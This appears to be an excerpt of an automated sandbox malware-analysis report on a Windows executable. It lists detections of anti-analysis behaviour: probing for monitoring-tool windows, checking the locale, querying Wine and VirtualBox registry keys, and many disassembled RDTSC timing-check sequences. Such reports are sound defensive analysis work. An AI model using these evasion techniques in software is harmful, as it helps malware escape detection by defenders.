                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007F9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007F9BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-37874
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ACE28E second address: ACE294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4A56F second address: C4A573 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4A573 second address: C4A58A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FBA68C246D6h 0x00000008 jmp 00007FBA68C246DDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4457C second address: C4459E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBA693F36BFh 0x00000009 jns 00007FBA693F36B6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49791 second address: C49795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49BA1 second address: C49BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49BAB second address: C49BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FBA68C246E7h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C49BCB second address: C49BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CB7C second address: C4CBB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D1AA4h], ebx 0x00000011 push 00000000h 0x00000013 push B12767D8h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FBA68C246E8h 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CBB2 second address: C4CBB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CBB8 second address: C4CC1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 4ED898A8h 0x0000000f push 00000003h 0x00000011 mov esi, dword ptr [ebp+122D2C80h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007FBA68C246D8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 call 00007FBA68C246E0h 0x00000038 jnc 00007FBA68C246DCh 0x0000003e pop esi 0x0000003f push 00000003h 0x00000041 cmc 0x00000042 call 00007FBA68C246D9h 0x00000047 push esi 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CC1E second address: C4CC30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 jnc 00007FBA693F36BEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CC30 second address: C4CC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FBA68C246D6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CC42 second address: C4CC66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FBA693F36BCh 0x0000000f popad 0x00000010 mov eax, dword ptr [eax] 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CC66 second address: C4CC7D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBA68C246DAh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CC7D second address: C4CC83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CD36 second address: C4CDF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007FBA68C246D8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 movzx ecx, si 0x00000027 push 00000000h 0x00000029 adc edx, 35F59484h 0x0000002f push AC5008F7h 0x00000034 jbe 00007FBA68C246EFh 0x0000003a jmp 00007FBA68C246E9h 0x0000003f add dword ptr [esp], 53AFF789h 0x00000046 mov edi, dword ptr [ebp+122D3917h] 0x0000004c push 00000003h 0x0000004e mov dword ptr [ebp+122D3A4Ch], ecx 0x00000054 push 00000000h 0x00000056 mov dword ptr [ebp+122D3A10h], ebx 0x0000005c mov edx, 68C1A197h 0x00000061 push 00000003h 0x00000063 mov di, bx 0x00000066 push 8FF3CD00h 0x0000006b jmp 00007FBA68C246E7h 0x00000070 xor dword ptr [esp], 4FF3CD00h 0x00000077 sub dword ptr [ebp+122D2907h], eax 0x0000007d lea ebx, dword ptr [ebp+12452AA4h] 0x00000083 mov dword ptr [ebp+12452876h], eax 0x00000089 push eax 0x0000008a jp 00007FBA68C246E0h 0x00000090 push eax 0x00000091 push edx 0x00000092 pushad 0x00000093 popad 0x00000094 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CE34 second address: C4CE5B instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA693F36B8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, dword ptr [ebp+122D2AD8h] 0x00000015 push 00000000h 0x00000017 sub dword ptr [ebp+122D37A7h], ecx 0x0000001d push 269AF360h 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CE5B second address: C4CE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CE5F second address: C4CEB5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBA693F36B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b xor dword ptr [esp], 269AF3E0h 0x00000012 push 00000003h 0x00000014 mov cx, 3A13h 0x00000018 push 00000000h 0x0000001a cld 0x0000001b push 00000003h 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007FBA693F36B8h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 mov dword ptr [ebp+122D3998h], esi 0x0000003d push D4468BE2h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jnp 00007FBA693F36B6h 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CEB5 second address: C4CEBB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CEBB second address: C4CEFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 14468BE2h 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FBA693F36B8h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 00000014h 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a cmc 0x0000002b lea ebx, dword ptr [ebp+12452AAFh] 0x00000031 mov dx, ax 0x00000034 push eax 0x00000035 pushad 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CEFF second address: C4CF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E2E6 second address: C5E2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69FF6 second address: C69FFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69FFC second address: C6A000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A723 second address: C6A749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b je 00007FBA68C246E8h 0x00000011 jmp 00007FBA68C246E0h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A749 second address: C6A751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6A751 second address: C6A757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AC08 second address: C6AC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AC0E second address: C6AC45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jc 00007FBA68C246D6h 0x00000010 pop edi 0x00000011 pop edx 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FBA68C246E4h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AC45 second address: C6AC55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FBA693F36B6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AC55 second address: C6AC5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AC5B second address: C6AC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6AF65 second address: C6AF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B259 second address: C6B267 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B267 second address: C6B2B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007FBA68C246E2h 0x0000000a jmp 00007FBA68C246E0h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jng 00007FBA68C246E8h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FBA68C246DDh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B2B9 second address: C6B2CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36C2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6337C second address: C63387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C63387 second address: C6338D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6338D second address: C633A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FBA68C246D6h 0x0000000e jnp 00007FBA68C246D6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C633A1 second address: C633C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBA693F36C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C633C5 second address: C633C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C633C9 second address: C633DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBA693F36BDh 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2FF3A second address: C2FF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70D17 second address: C70D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FBA693F36BDh 0x00000014 jmp 00007FBA693F36BEh 0x00000019 popad 0x0000001a jmp 00007FBA693F36BEh 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 pushad 0x00000023 jng 00007FBA693F36B8h 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d jnp 00007FBA693F36B6h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C70D72 second address: C70D86 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBA68C246D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C33495 second address: C334B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jc 00007FBA693F36C9h 0x0000000f jmp 00007FBA693F36BDh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34FBB second address: C34FC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34FC4 second address: C34FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C34FE8 second address: C3500F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBA68C246E9h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78E39 second address: C78E3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C78E3D second address: C78E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FBA68C246E4h 0x0000000e jmp 00007FBA68C246DEh 0x00000013 popad 0x00000014 pushad 0x00000015 push ecx 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FBA68C246DBh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79124 second address: C79134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jl 00007FBA693F36B6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79134 second address: C7913A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7913A second address: C79140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79140 second address: C7919E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 je 00007FBA68C246D6h 0x0000000e jmp 00007FBA68C246E3h 0x00000013 popad 0x00000014 jmp 00007FBA68C246DCh 0x00000019 popad 0x0000001a push esi 0x0000001b push ecx 0x0000001c jmp 00007FBA68C246E6h 0x00000021 jmp 00007FBA68C246E2h 0x00000026 pop ecx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7919E second address: C791A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C791A4 second address: C791A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C792D8 second address: C792E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jbe 00007FBA693F36B8h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C792E7 second address: C792EC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C795DE second address: C795E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C795E3 second address: C795F6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBA68C246DEh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79776 second address: C79780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBA693F36B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7CFEC second address: C7CFF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DDC3 second address: C7DDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jmp 00007FBA693F36C7h 0x0000000f pop eax 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7DDE5 second address: C7DDEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E2FA second address: C7E2FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E89D second address: C7E8A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E8A1 second address: C7E8A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7F813 second address: C7F82D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C808C8 second address: C808F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FBA693F36B6h 0x00000009 jp 00007FBA693F36B6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FBA693F36C1h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C808F0 second address: C80903 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA68C246DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81410 second address: C81414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8120D second address: C81213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81414 second address: C81487 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBA693F36C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov esi, eax 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007FBA693F36B8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b mov si, ax 0x0000002e push 00000000h 0x00000030 jl 00007FBA693F36D1h 0x00000036 call 00007FBA693F36C4h 0x0000003b mov edi, dword ptr [ebp+122D2BE8h] 0x00000041 pop esi 0x00000042 xchg eax, ebx 0x00000043 push ecx 0x00000044 push esi 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
